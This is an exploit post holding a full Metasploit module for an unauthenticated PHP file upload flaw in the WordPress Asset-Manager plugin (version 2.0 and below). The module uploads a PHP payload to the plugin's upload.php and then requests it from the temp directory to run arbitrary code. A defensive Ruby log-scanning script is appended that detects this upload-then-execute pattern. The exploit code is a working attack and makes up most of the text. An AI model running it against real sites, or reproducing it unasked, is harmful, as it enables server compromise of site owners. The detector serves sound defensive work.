WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the Asset-Manager plugin for WordPress, version 2.0 and below. The plugin allows PHP file upload: a user can upload a file to a temporary directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file is served from the plugin's temp directory under wp-content/uploads
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET',
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
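As an added defensive example, not part of the original post or of the Metasploit module above: a Ruby script that scans web server access-log lines for the trace this module leaves, an unauthenticated POST to the plugin's upload.php followed shortly by a GET of a .php file under wp-content/uploads/assets/temp/ from the same client. The log lines, client addresses and file names are constructed for the example; the paths are the ones the module requests.

```ruby
# Added example (not from the original post or the Metasploit module): detect the
# upload-then-execute pattern of the Asset-Manager upload.php issue in access logs.
require 'time'

# Apache/nginx combined log format: ip ident user [time] "METHOD path proto" status ...
LOG_RE      = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /
UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

# Parse combined-format lines into hashes; lines that do not match are skipped.
def parse_log(text)
  text.each_line.map do |line|
    m = LOG_RE.match(line)
    next unless m
    { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
      method: m[:method], path: m[:path].split('?').first, status: m[:status].to_i }
  end.compact
end

# One alert per GET of a .php file in the temp directory that is preceded, within
# `window` seconds and from the same client, by a successful POST to upload.php.
# Legitimate use of the plugin uploads media, not .php files, so the GET is the signal.
def detect_asset_manager_upload(text, window: 300)
  events  = parse_log(text)
  uploads = events.select { |e| e[:method] == 'POST' && e[:status] == 200 && e[:path] =~ UPLOAD_PATH }
  events.map do |e|
    next unless e[:method] == 'GET' && e[:path] =~ TEMP_PHP
    prior = uploads.find { |u| u[:ip] == e[:ip] && (e[:time] - u[:time]).between?(0, window) }
    next unless prior
    { ip: e[:ip], file: File.basename(e[:path]),
      uploaded_at: prior[:time].iso8601, executed_at: e[:time].iso8601 }
  end.compact
end

# Constructed sample log: one attack sequence, one legitimate image upload, one lone probe.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:22:33 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:22:34 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzxm.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:30:00 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 1190 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:30:02 +0800] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 1190 "-" "Mozilla/5.0"
  192.0.2.9 - - [31/Dec/2012:09:40:00 +0800] "GET /wordpress/wp-content/uploads/assets/temp/x.php HTTP/1.1" 404 0 "-" "curl/7.2"
LOG

if __FILE__ == $0
  detect_asset_manager_upload(SAMPLE_LOG).each { |a| puts "ALERT #{a[:ip]} uploaded and requested #{a[:file]} (#{a[:executed_at]})" }
end
```

The window defaults to five minutes because the module requests the file immediately after the upload; widen it when correlating across slower manual activity.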